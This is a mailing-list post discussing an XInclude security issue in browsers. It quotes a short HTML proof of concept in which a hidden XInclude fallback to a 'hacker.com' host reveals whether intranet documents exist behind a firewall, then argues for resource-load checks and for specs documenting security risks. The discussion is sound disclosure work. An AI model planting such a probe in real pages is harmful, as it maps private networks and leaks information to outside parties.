[
Lists Home |
Date Index |
Thread Index
]
Elliotte Rusty Harold wrote:
> <html xmlns:xi="http://www.w3.org/2001/XInclude">
> <body>
> Here's what the user normally sees
> </body>
> <span style="display: none">
> <xi:include parse="text"
> href="http://www.behindthefirewall.com/someURL">
> <xi:fallback
> href="http://www.hacker.com/?someURL=doesNotExist">
> </xi:fallback>
> </xi:include>
> </span>
> <html>
>
> Once a local user has loaded this into a web browser from behind the
> firewall, the original host site or some other remote site can easily
> determine whether some document exists on some server that would not
> normally be accessible to it. This scheme is not perfectly reliable.
> The biggest problem is that the attacker must have some good guesses
> as to likely local
[...]
> Partly this depends on browser security models. However, I suspect
> it's at least bad enough that browser vendors and other XInclude users
> should be made aware of the issues, and perhaps not XInclude by
> default; or perhaps it would be enough just not to fallback. Or
> perhaps not make the post-inclusion DOM available through scripting.
> Or limit the URLs included to ones from the same host as the base page
> came from. Thoughts?
Things like this are very common in the browser world, and are usually
noticed in time (you can find some "famous" examples where they were
not;). Typically all resource loads should go through a check that
determines if the resource load is allowed. XInclude initiated resource
loads should not be any different. (There are some exceptions to the
resource load checks, like image loads, because historically they have
behaved that way and changing implementations would break lots of sites
and limit the usefulness of these technologies severely. However, from
privacy/security point of view they are still bugs. With new specs we
have a change of making the implementations safe to begin with.)
From an implementor point of view it would be great if the specs
themselves pointed out potential privacy/security issues. However, most
standards groups explicitly state that it is not their position to do
this. It would be a lot more work. Also, what is a privacy/security
issue in one context is not necessarily an issue in some other context.
Think of an implementation on the server compared to the client, for
example. If the people working on a spec do not have variable needs and
backgrounds they might be blind to problems in other contexts. Public
comment periods could help a lot, of course ("Please point out the
parts of the spec that could cause potential privacy or security issues.")
Privacy and security issues can easily be exposed by moving an
implementation from one context to another, like moving an intranet-only
server-side component to a client that operates on the public internet.
I think that if the spec specifically mentioned the potential security
holes with the technology, it would be easier to do this kind of context
switch as well; the security issues would be just more explicit points
to check before you decree standards compliance and victory.
--
Heikki Toivonen
S/MIME Cryptographic Signature
|